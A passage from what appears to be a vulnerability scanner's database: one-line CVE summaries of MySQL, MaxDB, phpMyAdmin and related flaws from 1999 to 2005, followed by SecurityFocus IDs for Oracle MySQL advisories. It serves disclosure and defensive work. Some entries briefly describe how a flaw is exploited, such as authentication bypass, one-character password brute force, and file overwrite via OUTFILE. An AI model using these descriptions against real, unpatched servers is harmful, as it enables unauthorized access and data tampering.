19157| [CVE-2005-0544] phpMyAdmin 2.6.1 allows remote attackers to obtain the full path of the server via direct requests to (1) sqlvalidator.lib.php, (2) sqlparser.lib.php, (3) select_theme.lib.php, (4) select_lang.lib.php, (5) relation_cleanup.lib.php, (6) header_meta_style.inc.php, (7) get_foreign.lib.php, (8) display_tbl_links.lib.php, (9) display_export.lib.php, (10) db_table_exists.lib.php, (11) charset_conversion.lib.php, (12) ufpdf.php, (13) mysqli.dbi.lib.php, (14) setup.php, or (15) cookie.auth.lib.php, which reveals the path in a PHP error message.
19158| [CVE-2005-0111] Stack-based buffer overflow in the websql CGI program in MySQL MaxDB 7.5.00 allows remote attackers to execute arbitrary code via a long password parameter.
19159| [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference.
19160| [CVE-2005-0082] The sapdbwa_GetUserData function in MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via invalid parameters to the WebDAV handler code, which triggers a null dereference that causes the SAP DB Web Agent to crash.
19161| [CVE-2005-0081] MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via an HTTP request with invalid headers.
19162| [CVE-2005-0004] The mysqlaccess script in MySQL 4.0.23 and earlier, 4.1.x before 4.1.10, 5.0.x before 5.0.3, and other versions including 3.x, allows local users to overwrite arbitrary files or read temporary files via a symlink attack on temporary files.
19163| [CVE-2004-2632] phpMyAdmin 2.5.1 up to 2.5.7 allows remote attackers to modify configuration settings and gain unauthorized access to MySQL servers via modified $cfg['Servers'] variables.
19164| [CVE-2004-2398] Netenberg Fantastico De Luxe 2.8 uses database file names that contain the associated usernames, which allows local users to determine valid usernames and conduct brute force attacks by reading the file names from /var/lib/mysql, which is assigned world-readable permissions by cPanel 9.3.0 R5.
19165| [CVE-2004-2357] The embedded MySQL 4.0 server for Proofpoint Protection Server does not require a password for the root user of MySQL, which allows remote attackers to read or modify the backend database.
19166| [CVE-2004-2354] SQL injection vulnerability in 4nGuestbook 0.92 for PHP-Nuke 6.5 through 6.9 allows remote attackers to modify SQL statements via the entry parameter to modules.php, which can also facilitate cross-site scripting (XSS) attacks when MySQL errors are triggered.
19167| [CVE-2004-2149] Buffer overflow in the prepared statements API in libmysqlclient for MySQL 4.1.3 beta and 4.1.4 allows remote attackers to cause a denial of service via a large number of placeholders.
19168| [CVE-2004-2138] Cross-site scripting (XSS) vulnerability in AWSguest.php in AllWebScripts MySQLGuest allows remote attackers to inject arbitrary HTML and PHP code via the (1) Name, (2) Email, (3) Homepage or (4) Comments field.
19169| [CVE-2004-1228] The install scripts in SugarCRM Sugar Sales 2.0.1c and earlier are not removed after installation, which allows attackers to obtain the MySQL administrative password in cleartext from an installation form, or to cause a denial of service by changing database settings to the default.
19170| [CVE-2004-0957] Unknown vulnerability in MySQL 3.23.58 and earlier, when a local user has privileges for a database whose name includes a "_" (underscore), grants privileges to other databases that have similar names, which can allow the user to conduct unauthorized activities.
19171| [CVE-2004-0956] MySQL before 4.0.20 allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote.
19172| [CVE-2004-0931] MySQL MaxDB before 7.5.00.18 allows remote attackers to cause a denial of service (crash) via an HTTP request to webdbm with high ASCII values in the Server field, which triggers an assert error in the IsAscii7 function.
19173| [CVE-2004-0837] MySQL 4.x before 4.0.21, and 3.x before 3.23.49, allows attackers to cause a denial of service (crash or hang) via multiple threads that simultaneously alter MERGE table UNIONs.
19174| [CVE-2004-0836] Buffer overflow in the mysql_real_connect function in MySQL 4.x before 4.0.21, and 3.x before 3.23.49, allows remote DNS servers to cause a denial of service and possibly execute arbitrary code via a DNS response with a large address length (h_length).
19175| [CVE-2004-0835] MySQL 3.x before 3.23.59, 4.x before 4.0.19, 4.1.x before 4.1.2, and 5.x before 5.0.1, checks the CREATE/INSERT rights of the original table instead of the target table in an ALTER TABLE RENAME operation, which could allow attackers to conduct unauthorized activities.
19176| [CVE-2004-0628] Stack-based buffer overflow in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long scramble string.
19177| [CVE-2004-0627] The check_scramble_323 function in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to bypass authentication via a zero-length scrambled string.
19178| [CVE-2004-0457] The mysqlhotcopy script in mysql 4.0.20 and earlier, when using the scp method from the mysql-server package, allows local users to overwrite arbitrary files via a symlink attack on temporary files.
19179| [CVE-2004-0388] The mysqld_multi script in MySQL allows local users to overwrite arbitrary files via a symlink attack.
19180| [CVE-2004-0381] mysqlbug in MySQL allows local users to overwrite arbitrary files via a symlink attack on the failed-mysql-bugreport temporary file.
19181| [CVE-2003-1480] MySQL 3.20 through 4.1.0 uses a weak algorithm for hashed passwords, which makes it easier for attackers to decrypt the password via brute force methods.
19182| [CVE-2003-1421] Unspecified vulnerability in mod_mysql_logger shared object in SuckBot 0.006 allows remote attackers to cause a denial of service (seg fault) via unknown attack vectors.
19183| [CVE-2003-1383] WEB-ERP 0.1.4 and earlier allows remote attackers to obtain sensitive information via an HTTP request for the logicworks.ini file, which contains the MySQL database username and password.
19184| [CVE-2003-1331] Stack-based buffer overflow in the mysql_real_connect function in the MySql client library (libmysqlclient) 4.0.13 and earlier allows local users to execute arbitrary code via a long socket name, a different vulnerability than CVE-2001-1453.
19185| [CVE-2003-0780] Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
19186| [CVE-2003-0515] SQL injection vulnerabilities in the (1) PostgreSQL or (2) MySQL authentication modules for teapop 0.3.5 and earlier allow attackers to execute arbitrary SQL and possibly gain privileges.
19187| [CVE-2003-0150] MySQL 3.23.55 and earlier creates world-writeable files and allows mysql users to gain root privileges by using the "SELECT * INFO OUTFILE" operator to overwrite a configuration file and cause mysql to run as root upon restart, as demonstrated by modifying my.cnf.
19188| [CVE-2003-0073] Double-free vulnerability in mysqld for MySQL before 3.23.55 allows attackers with MySQL access to cause a denial of service (crash) via mysql_change_user.
19189| [CVE-2002-2043] SQL injection vulnerability in the LDAP and MySQL authentication patch for Cyrus SASL 1.5.24 and 1.5.27 allows remote attackers to execute arbitrary SQL commands and log in as arbitrary POP mail users via the password.
19190| [CVE-2002-1952] phpRank 1.8 does not properly check the return codes for MySQL operations when authenticating users, which could allow remote attackers to authenticate using a NULL password when database errors occur or if the database is unavailable.
19191| [CVE-2002-1923] The default configuration in MySQL 3.20.32 through 3.23.52, when running on Windows, does not have logging enabled, which could allow remote attackers to conduct activities without detection.
19192| [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database.
19193| [CVE-2002-1809] The default configuration of the Windows binary release of MySQL 3.23.2 through 3.23.52 has a NULL root password, which could allow remote attackers to gain unauthorized root access to the MySQL database.
19194| [CVE-2002-1479] Cacti before 0.6.8 stores a MySQL username and password in plaintext in config.php, which has world-readable permissions, which allows local users modify databases as the Cacti user and possibly gain privileges.
19195| [CVE-2002-1376] libmysqlclient client library in MySQL 3.x to 3.23.54, and 4.x to 4.0.6, does not properly verify length fields for certain responses in the (1) read_rows or (2) read_one_row routines, which allows remote attackers to cause a denial of service and possibly execute arbitrary code.
19196| [CVE-2002-1375] The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x to 4.0.6, allows remote attackers to execute arbitrary code via a long response.
19197| [CVE-2002-1374] The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x before 4.0.6, allows remote attackers to gain privileges via a brute force attack using a one-character password, which causes MySQL to only compare the provided password against the first character of the real password.
19198| [CVE-2002-1373] Signed integer vulnerability in the COM_TABLE_DUMP package for MySQL 3.23.x before 3.23.54 allows remote attackers to cause a denial of service (crash or hang) in mysqld by causing large negative integers to be provided to a memcpy call.
19199| [CVE-2002-0969] Buffer overflow in MySQL daemon (mysqld) before 3.23.50, and 4.0 beta before 4.02, on the Win32 platform, allows local users to execute arbitrary code via a long "datadir" parameter in the my.ini initialization file, whose permissions on Windows allow Full Control to the Everyone group.
19200| [CVE-2002-0229] Safe Mode feature (safe_mode) in PHP 3.0 through 4.1.0 allows attackers with access to the MySQL database to bypass Safe Mode access restrictions and read arbitrary files using "LOAD DATA INFILE LOCAL" SQL statements.
19201| [CVE-2001-1454] Buffer overflow in MySQL before 3.23.33 allows remote attackers to execute arbitrary code via a long drop database request.
19202| [CVE-2001-1453] Buffer overflow in libmysqlclient.so in MySQL 3.23.33 and earlier allows remote attackers to execute arbitrary code via a long host parameter.
19203| [CVE-2001-1275] MySQL before 3.23.31 allows users with a MySQL account to use the SHOW GRANTS command to obtain the encrypted administrator password from the mysql.user table and possibly gain privileges via password cracking.
19204| [CVE-2001-1274] Buffer overflow in MySQL before 3.23.31 allows attackers to cause a denial of service and possibly gain privileges.
19205| [CVE-2001-1255] WinMySQLadmin 1.1 stores the MySQL password in plain text in the my.ini file, which allows local users to obtain unathorized access the MySQL database.
19206| [CVE-2001-1226] AdCycle 1.17 and earlier allow remote attackers to modify SQL queries, which are not properly sanitized before being passed to the MySQL database.
19207| [CVE-2001-1044] Basilix Webmail 0.9.7beta, and possibly other versions, stores *.class and *.inc files under the document root and does not restrict access, which could allows remote attackers to obtain sensitive information such as MySQL passwords and usernames from the mysql.class file.
19208| [CVE-2001-0990] Inter7 vpopmail 4.10.35 and earlier, when using the MySQL module, compiles authentication information in cleartext into the libvpopmail.a library, which allows local users to obtain the MySQL username and password by inspecting the vpopmail programs that use the library.
19209| [CVE-2001-0645] Symantec/AXENT NetProwler 3.5.x contains several default passwords, which could allow remote attackers to (1) access to the management tier via the "admin" password, or (2) connect to a MySQL ODBC from the management tier using a blank password.
19210| [CVE-2001-0407] Directory traversal vulnerability in MySQL before 3.23.36 allows local users to modify arbitrary files and gain privileges by creating a database whose name starts with .. (dot dot).
19211| [CVE-2000-0981] MySQL Database Engine uses a weak authentication method which leaks information that could be used by a remote attacker to recover the password.
19212| [CVE-2000-0957] The pluggable authentication module for mysql (pam_mysql) before 0.4.7 does not properly cleanse user input when constructing SQL statements, which allows attackers to obtain plaintext passwords or hashes.
19213| [CVE-2000-0707] PCCS MySQLDatabase Admin Tool Manager 1.2.4 and earlier installs the file dbconnect.inc within the web root, which allows remote attackers to obtain sensitive information such as the administrative password.
19214| [CVE-2000-0148] MySQL 3.22 allows remote attackers to bypass password authentication and access a database via a short check string.
19215| [CVE-2000-0045] MySQL allows local users to modify passwords for arbitrary MySQL users via the GRANT privilege.
19216| [CVE-1999-1188] mysqld in MySQL 3.21 creates log files with world-readable permissions, which allows local users to obtain passwords for users who are added to the user database.
19217|
19218| SecurityFocus - https://www.securityfocus.com/bid/:
19219| [104370] MySQL Multi-Master Replication Manager Multiple Remote Command Injection Vulnerabilities
19220| [103954] Oracle MySQL CVE-2018-2767 Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
19221| [103876] Oracle MySQL Server CVE-2018-2769 Remote Security Vulnerability
19222| [103845] Oracle MySQL Server CVE-2018-2839 Remote Security Vulnerability
19223| [103838] Oracle MySQL Cluster CVE-2018-2877 Local Security Vulnerability
19224| [103836] Oracle MySQL Server CVE-2018-2812 Remote Security Vulnerability
19225| [103831] Oracle MySQL Server CVE-2018-2805 Remote Security Vulnerability
19226| [103830] Oracle MySQL Server CVE-2018-2813 Remote Security Vulnerability
19227| [103828] Oracle MySQL Server CVE-2018-2771 Remote Security Vulnerability
19228| [103825] Oracle MySQL Server CVE-2018-2781 Remote Security Vulnerability
19229| [103824] Oracle MySQL Server CVE-2018-2818 Remote Security Vulnerability
19230| [103820] Oracle MySQL Server CVE-2018-2761 Remote Security Vulnerability
19231| [103818] Oracle MySQL Server CVE-2018-2817 Remote Security Vulnerability
19232| [103814] Oracle MySQL Server CVE-2018-2819 Remote Security Vulnerability
19233| [103811] Oracle MySQL Server CVE-2018-2773 Local Security Vulnerability
19234| [103807] Oracle MySQL Server CVE-2018-2755 Local Security Vulnerability
19235| [103805] Oracle MySQL Server CVE-2018-2766 Remote Security Vulnerability
19236| [103804] Oracle MySQL Server CVE-2018-2787 Remote Security Vulnerability
19237| [103802] Oracle MySQL Server CVE-2018-2758 Remote Security Vulnerability
19238| [103801] Oracle MySQL Server CVE-2018-2784 Remote Security Vulnerability
19239| [103799] Oracle MySQL Server CVE-2018-2782 Remote Security Vulnerability
19240| [103794] Oracle MySQL Server CVE-2018-2762 Remote Security Vulnerability
19241| [103791] Oracle MySQL Server CVE-2018-2776 Remote Security Vulnerability
19242| [103790] Oracle MySQL Server CVE-2018-2846 Remote Security Vulnerability
19243| [103789] Oracle MySQL Server CVE-2018-2816 Remote Security Vulnerability
19244| [103787] Oracle MySQL Server CVE-2018-2779 Remote Security Vulnerability
19245| [103785] Oracle MySQL Server CVE-2018-2778 Remote Security Vulnerability
19246| [103783] Oracle MySQL Server CVE-2018-2810 Remote Security Vulnerability
19247| [103781] Oracle MySQL Server CVE-2018-2777 Remote Security Vulnerability
19248| [103780] Oracle MySQL Server CVE-2018-2759 Remote Security Vulnerability
19249| [103779] Oracle MySQL Server CVE-2018-2786 Remote Security Vulnerability
19250| [103778] Oracle MySQL Server CVE-2018-2780 Remote Security Vulnerability
19251| [103777] Oracle MySQL Server CVE-2018-2775 Remote Security Vulnerability
19252| [102714] Oracle MySQL Server CVE-2018-2591 Remote Security Vulnerability
19253| [102713] Oracle MySQL Server CVE-2018-2562 Remote Security Vulnerability
19254| [102712] Oracle MySQL Server CVE-2018-2565 Remote Security Vulnerability
19255| [102711] Oracle MySQL Server CVE-2018-2647 Remote Security Vulnerability
19256| [102710] Oracle MySQL Server CVE-2018-2573 Remote Security Vulnerability
19257| [102709] Oracle MySQL Server CVE-2018-2612 Remote Security Vulnerability
19258| [102708] Oracle MySQL Server CVE-2018-2583 Remote Security Vulnerability
19259| [102706] Oracle MySQL Server CVE-2018-2622 Remote Security Vulnerability
19260| [102704] Oracle MySQL Server CVE-2018-2703 Remote Security Vulnerability
19261| [102703] Oracle MySQL Server CVE-2018-2646 Remote Security Vulnerability
19262| [102701] Oracle MySQL Server CVE-2018-2696 Remote Security Vulnerability
19263| [102700] Oracle MySQL Server CVE-2018-2586 Remote Security Vulnerability
19264| [102698] Oracle MySQL Server CVE-2018-2645 Remote Security Vulnerability
19265| [102697] Oracle MySQL Server CVE-2018-2590 Remote Security Vulnerability
19266| [102696] Oracle MySQL Server CVE-2018-2600 Remote Security Vulnerability
19267| [102695] Oracle MySQL Server CVE-2018-2576 Remote Security Vulnerability
19268| [102685] Oracle MySQL Server CVE-2018-2667 Remote Security Vulnerability
19269| [102682] Oracle MySQL Server CVE-2018-2668 Remote Security Vulnerability
19270| [102681] Oracle MySQL Server CVE-2018-2665 Remote Security Vulnerability
19271| [102678] Oracle MySQL Server CVE-2018-2640 Remote Security Vulnerability
19272| [102674] Oracle MySQL Connectors CVE-2018-2585 Remote Security Vulnerability
19273| [101448] Oracle MySQL Server CVE-2017-10313 Remote Security Vulnerability
19274| [101446] Oracle MySQL Server CVE-2017-10311 Remote Security Vulnerability
19275| [101444] Oracle MySQL Server CVE-2017-10294 Remote Security Vulnerability
19276| [101441] Oracle MySQL Server CVE-2017-10276 Remote Security Vulnerability
19277| [101439] Oracle MySQL Connectors CVE-2017-10277 Remote Security Vulnerability
19278| [101433] Oracle MySQL Server CVE-2017-10167 Remote Security Vulnerability
19279| [101429] Oracle MySQL Server CVE-2017-10365 Remote Security Vulnerability
19280| [101424] Oracle MySQL Server CVE-2017-10165 Remote Security Vulnerability
19281| [101420] Oracle MySQL Server CVE-2017-10283 Remote Security Vulnerability
19282| [101415] Oracle MySQL Server CVE-2017-10379 Remote Security Vulnerability
19283| [101410] Oracle MySQL Server CVE-2017-10320 Remote Security Vulnerability
19284| [101406] Oracle MySQL Server CVE-2017-10384 Remote Security Vulnerability
19285| [101402] Oracle MySQL Server CVE-2017-10155 Remote Security Vulnerability
19286| [101397] Oracle MySQL Server CVE-2017-10286 Remote Security Vulnerability
19287| [101390] Oracle MySQL Server CVE-2017-10268 Local Security Vulnerability
19288| [101385] Oracle MySQL Server CVE-2017-10284 Remote Security Vulnerability
19289| [101381] Oracle MySQL Enterprise Monitor CVE-2017-10424 Remote Security Vulnerability
19290| [101375] Oracle MySQL Server CVE-2017-10378 Remote Security Vulnerability
19291| [101373] Oracle MySQL Server CVE-2017-10296 Remote Security Vulnerability
19292| [101337] Oracle MySQL Server CVE-2017-10227 Remote Security Vulnerability
19293| [101324] Oracle MySQL Connectors CVE-2017-10203 Remote Security Vulnerability
19294| [101316] Oracle MySQL Server CVE-2017-10279 Remote Security Vulnerability
19295| [101314] Oracle MySQL Server CVE-2017-10314 Remote Security Vulnerability
19296| [99810] Oracle MySQL Server CVE-2017-3653 Remote Security Vulnerability
19297| [99808] Oracle MySQL Server CVE-2017-3650 Remote Security Vulnerability
19298| [99805] Oracle MySQL Server CVE-2017-3652 Remote Security Vulnerability
19299| [99802] Oracle MySQL Server CVE-2017-3651 Remote Security Vulnerability
19300| [99799] Oracle MySQL Server CVE-2017-3649 Remote Security Vulnerability
19301| [99796] Oracle MySQL Server CVE-2017-3647 Remote Security Vulnerability
19302| [99789] Oracle MySQL Server CVE-2017-3648 Remote Security Vulnerability
19303| [99786] Oracle MySQL Server CVE-2017-3646 Remote Security Vulnerability
19304| [99783] Oracle MySQL Server CVE-2017-3645 Remote Security Vulnerability
19305| [99779] Oracle MySQL Server CVE-2017-3642 Remote Security Vulnerability
19306| [99778] Oracle MySQL Server CVE-2017-3638 Remote Security Vulnerability
19307| [99775] Oracle MySQL Server CVE-2017-3644 Remote Security Vulnerability
19308| [99772] Oracle MySQL Server CVE-2017-3643 Remote Security Vulnerability
19309| [99767] Oracle MySQL Server CVE-2017-3641 Remote Security Vulnerability
19310| [99765] Oracle MySQL Server CVE-2017-3640 Remote Security Vulnerability
19311| [99753] Oracle MySQL Server CVE-2017-3639 Remote Security Vulnerability
19312| [99748] Oracle MySQL Server CVE-2017-3637 Remote Security Vulnerability
19313| [99746] Oracle MySQL Server CVE-2017-3529 Remote Security Vulnerability
19314| [99736] Oracle MySQL Server CVE-2017-3636 Local Security Vulnerability
19315| [99730] Oracle MySQL Connectors/MySQL Server CVE-2017-3635 Remote Security Vulnerability
19316| [99729] Oracle MySQL Server CVE-2017-3634 Remote Security Vulnerability
19317| [99722] Oracle MySQL Server CVE-2017-3633 Remote Security Vulnerability
19318| [99374] Perl DBD::mysql Module CVE-2017-10788 Use After Free Denial of Service Vulnerability
19319| [99364] Perl DBD::mysql Module CVE-2017-10789 Man in the Middle Security Bypass Vulnerability
19320| [97982] Oracle MySQL Connectors CVE-2017-3523 Remote Security Vulnerability
19321| [97960] MySQL-GUI-tools CVE-2010-4178 Local Information Disclosure Vulnerability
19322| [97959] MySQL-GUI-tools CVE-2010-4177 Local Information Disclosure Vulnerability
19323| [97851] Oracle MySQL Server CVE-2017-3462 Remote Security Vulnerability
19324| [97849] Oracle MySQL Server CVE-2017-3463 Remote Security Vulnerability
19325| [97848] Oracle MySQL Server CVE-2017-3468 Remote Security Vulnerability
19326| [97847] Oracle MySQL Server CVE-2017-3459 Remote Security Vulnerability
19327| [97845] Oracle MySQL Server CVE-2017-3457 Remote Security Vulnerability
19328| [97844] Oracle MySQL Enterprise Monitor CVE-2017-3307 Remote Security Vulnerability
19329| [97840] Oracle MySQL Connectors CVE-2017-3590 Local Security Vulnerability
19330| [97837] Oracle MySQL Server CVE-2017-3458 Remote Security Vulnerability
19331| [97836] Oracle MySQL Connectors CVE-2017-3589 Local Security Vulnerability
19332| [97833] Oracle MySQL Workbench CVE-2017-3469 Remote Security Vulnerability
19333| [97831] Oracle MySQL Server CVE-2017-3456 Remote Security Vulnerability
19334| [97826] Oracle MySQL Server CVE-2017-3460 Remote Security Vulnerability
19335| [97825] Oracle MySQL Server CVE-2017-3467 Remote Security Vulnerability
19336| [97822] Oracle MySQL Server CVE-2017-3465 Remote Security Vulnerability
19337| [97820] Oracle MySQL Server CVE-2017-3455 Remote Security Vulnerability
19338| [97818] Oracle MySQL Server CVE-2017-3464 Remote Security Vulnerability
19339| [97815] Oracle MySQL Cluster CVE-2017-3304 Remote Security Vulnerability
19340| [97812] Oracle MySQL Server CVE-2017-3461 Remote Security Vulnerability
19341| [97791] Oracle MySQL Server CVE-2017-3454 Remote Security Vulnerability
19342| [97784] Oracle MySQL Connectors CVE-2017-3586 Remote Security Vulnerability
19343| [97779] Oracle MySQL Server CVE-2017-3452 Remote Security Vulnerability
19344| [97776] Oracle MySQL Server CVE-2017-3453 Remote Security Vulnerability
19345| [97772] Oracle MySQL Server CVE-2017-3331 Remote Security Vulnerability
19346| [97765] Oracle MySQL Server CVE-2017-3600 Remote Security Vulnerability
19347| [97763] Oracle MySQL Server CVE-2017-3329 Remote Security Vulnerability
19348| [97754] Oracle MySQL Server CVE-2017-3599 Remote Security Vulnerability
19349| [97747] Oracle MySQL Server CVE-2017-3450 Remote Security Vulnerability
19350| [97742] Oracle MySQL Server CVE-2017-3309 Remote Security Vulnerability
19351| [97725] Oracle MySQL Server CVE-2017-3308 Remote Security Vulnerability
19352| [97724] Oracle MySQL Enterprise Monitor CVE-2017-3306 Remote Security Vulnerability
19353| [97023] MySQL CVE-2017-3305 Man in the Middle Security Bypass Vulnerability
19354| [96300] PHP 'ext/mysqli/mysqli.c' Denial of Service Vulnerability
19355| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
19356| [95592] Oracle MySQL Cluster CVE-2016-5541 Remote Security Vulnerability
19357| [95589] Oracle MySQL Server CVE-2017-3257 Remote Security Vulnerability
19358| [95588] Oracle MySQL Server CVE-2017-3318 Local Security Vulnerability
19359| [95585] Oracle MySQL Server CVE-2017-3317 Local Security Vulnerability
19360| [95583] Oracle MySQL Server CVE-2017-3273 Remote Security Vulnerability
19361| [95580] Oracle MySQL Server CVE-2016-8318 Remote Security Vulnerability
19362| [95575] Oracle MySQL Cluster CVE-2017-3323 Remote Security Vulnerability
19363| [95574] Oracle MySQL Cluster CVE-2017-3322 Remote Security Vulnerability
19364| [95571] Oracle MySQL Server CVE-2017-3238 Remote Security Vulnerability
19365| [95565] Oracle MySQL Server CVE-2017-3244 Remote Security Vulnerability
19366| [95562] Oracle MySQL Cluster CVE-2017-3321 Remote Security Vulnerability
19367| [95560] Oracle MySQL Server CVE-2017-3258 Remote Security Vulnerability
19368| [95542] Oracle MySQL Enterprise Monitor CVE-2016-5590 Remote Security Vulnerability
19369| [95538] Oracle MySQL Server CVE-2017-3243 Remote Security Vulnerability
19370| [95527] Oracle MySQL Server CVE-2017-3313 Local Security Vulnerability
19371| [95520] Oracle MySQL Server CVE-2017-3265 Local Security Vulnerability
19372| [95501] Oracle MySQL Server CVE-2017-3291 Local Security Vulnerability
19373| [95491] Oracle MySQL Server CVE-2017-3312 Local Security Vulnerability
19374| [95486] Oracle MySQL Server CVE-2017-3256 Remote Security Vulnerability
19375| [95482] Oracle MySQL Server CVE-2017-3251 Remote Security Vulnerability
19376| [95479] Oracle MySQL Server CVE-2017-3319 Remote Security Vulnerability
19377| [95470] Oracle MySQL Server CVE-2017-3320 Remote Security Vulnerability
19378| [95146] Pivotal MySQL for PCF CVE-2016-0898 Information Disclosure Vulnerability
19379| [94350] DBD::mysql CVE-2016-1249 Out-Of-Bounds Read Information Disclosure Vulnerability
19380| [93755] Oracle MySQL CVE-2016-8284 Local Security Vulnerability
19381| [93745] Oracle MySQL CVE-2016-8286 Remote Security Vulnerability
19382| [93740] Oracle MySQL CVE-2016-8288 Remote Security Vulnerability
19383| [93737] Oracle MySQL CVE-2016-8283 Remote Security Vulnerability
19384| [93735] Oracle MySQL CVE-2016-5584 Remote Security Vulnerability
19385| [93733] Oracle MySQL CVE-2016-8290 Remote Security Vulnerability
19386| [93727] Oracle MySQL CVE-2016-8287 Remote Security Vulnerability
19387| [93720] Oracle MySQL CVE-2016-8289 Local Security Vulnerability
19388| [93715] Oracle MySQL CVE-2016-5635 Remote Security Vulnerability
19389| [93709] Oracle MySQL CVE-2016-5634 Remote Security Vulnerability
19390| [93702] Oracle MySQL CVE-2016-5633 Remote Security Vulnerability
19391| [93693] Oracle MySQL CVE-2016-5632 Remote Security Vulnerability
19392| [93684] Oracle MySQL CVE-2016-5631 Remote Security Vulnerability
19393| [93678] Oracle MySQL CVE-2016-5507 Remote Security Vulnerability
19394| [93674] Oracle MySQL CVE-2016-5630 Remote Security Vulnerability
19395| [93670] Oracle MySQL CVE-2016-3495 Remote Security Vulnerability
19396| [93668] Oracle MySQL CVE-2016-5629 Remote Security Vulnerability
19397| [93662] Oracle MySQL CVE-2016-5628 Remote Security Vulnerability
19398| [93659] Oracle MySQL CVE-2016-7440 Local Security Vulnerability
19399| [93653] Oracle MySQL Connector CVE-2016-5598 Remote Security Vulnerability
19400| [93650] Oracle MySQL CVE-2016-3492 Remote Security Vulnerability
19401| [93642] Oracle MySQL CVE-2016-5627 Remote Security Vulnerability
19402| [93638] Oracle MySQL CVE-2016-5626 Remote Security Vulnerability
19403| [93635] Oracle MySQL CVE-2016-5624 Remote Security Vulnerability
19404| [93630] Oracle MySQL CVE-2016-5612 Remote Security Vulnerability
19405| [93622] Oracle MySQL CVE-2016-5609 Remote Security Vulnerability
19406| [93617] Oracle MySQL CVE-2016-5625 Local Security Vulnerability
19407| [93614] RETIRED: Oracle MySQL CVE-2016-5616 Local Security Vulnerability
19408| [93612] Oracle MySQL CVE-2016-6664 Local Security Vulnerability
19409| [93480] Pivotal Cloud Foundry cf-mysql CVE-2016-6653 Information Disclosure Vulnerability
19410| [93337] perl-DBD-MySQL CVE-2016-1246 Remote Buffer Overflow Vulnerability
19411| [92912] Oracle MySQL CVE-2016-6662 Remote Code Execution Vulnerability
19412| [92911] Oracle MySQL CVE-2016-6663 Unspecified Security Vulnerability
19413| [92149] DBD::mysql CVE-2014-9906 Incomplete Fix Use After Free Remote Code Execution Vulnerability
19414| [92118] DBD::mysql 'my_login()' Function Use After Free Remote Code Execution Vulnerability
19415| [91999] Oracle MySQL CVE-2016-3452 Remote Security Vulnerability
19416| [91992] Oracle MySQL CVE-2016-3614 Remote Security Vulnerability
19417| [91987] Oracle MySQL CVE-2016-5444 Remote Security Vulnerability
19418| [91983] Oracle MySQL CVE-2016-3588 Remote Security Vulnerability
19419| [91980] Oracle MySQL CVE-2016-3486 Remote Security Vulnerability
19420| [91976] Oracle MySQL CVE-2016-3424 Remote Security Vulnerability
19421| [91974] Oracle MySQL CVE-2016-5442 Remote Security Vulnerability
19422| [91969] Oracle MySQL CVE-2016-5439 Remote Security Vulnerability
19423| [91967] Oracle MySQL CVE-2016-3518 Remote Security Vulnerability
19424| [91963] Oracle MySQL CVE-2016-5443 Local Security Vulnerability
19425| [91960] Oracle MySQL CVE-2016-3615 Remote Security Vulnerability
19426| [91953] Oracle MySQL CVE-2016-5440 Remote Security Vulnerability
19427| [91949] Oracle MySQL CVE-2016-3501 Remote Security Vulnerability
19428| [91943] Oracle MySQL CVE-2016-3459 Remote Security Vulnerability
19429| [91932] Oracle MySQL CVE-2016-3521 Remote Security Vulnerability
19430| [91917] Oracle MySQL CVE-2016-5437 Remote Security Vulnerability
19431| [91915] Oracle MySQL CVE-2016-5441 Remote Security Vulnerability
19432| [91913] Oracle MySQL CVE-2016-3471 Local Security Vulnerability
19433| [91910] Oracle MySQL CVE-2016-3440 Remote Security Vulnerability
19434| [91906] Oracle MySQL CVE-2016-5436 Remote Security Vulnerability
19435| [91902] Oracle MySQL CVE-2016-3477 Local Security Vulnerability
19436| [90165] MySQL CVE-2005-0799 Denial-Of-Service Vulnerability
19437| [89812] xMySQLadmin CVE-2005-1944 Local Security Vulnerability
19438| [89412] MySQL CVE-2005-2573 Directory Traversal Vulnerability
19439| [88627] MySQL CVE-1999-1188 Local Security Vulnerability
19440| [88032] MySQL CVE-2001-1275 Local Security Vulnerability
19441| [87310] Btsavemysql CVE-2006-6378 Remote Security Vulnerability
19442| [86999] MySQL CVE-2001-1274 Denial-Of-Service Vulnerability
19443| [86513] Oracle MySQL CVE-2016-0665 Remote Security Vulnerability
19444| [86511] Oracle MySQL CVE-2016-0661 Remote Security Vulnerability
19445| [86509] Oracle MySQL CVE-2016-0666 Remote Security Vulnerability
19446| [86506] Oracle MySQL CVE-2016-0662 Remote Security Vulnerability
19447| [86504] Oracle MySQL CVE-2016-0654 Remote Security Vulnerability
19448| [86501] Oracle MySQL CVE-2016-0651 Remote Security Vulnerability
19449| [86498] Oracle MySQL CVE-2016-0649 Remote Security Vulnerability
19450| [86496] Oracle MySQL CVE-2016-0650 Remote Security Vulnerability
19451| [86495] Oracle MySQL CVE-2016-0647 Remote Security Vulnerability
19452| [86493] Oracle MySQL CVE-2016-0659 Remote Security Vulnerability
19453| [86489] Oracle MySQL CVE-2016-3461 Remote Security Vulnerability
19454| [86486] Oracle MySQL CVE-2016-0643 Remote Security Vulnerability
19455| [86484] Oracle MySQL CVE-2016-0667 Remote Security Vulnerability
19456| [86470] Oracle MySQL CVE-2016-0641 Remote Security Vulnerability
19457| [86467] Oracle MySQL CVE-2016-0668 Remote Security Vulnerability
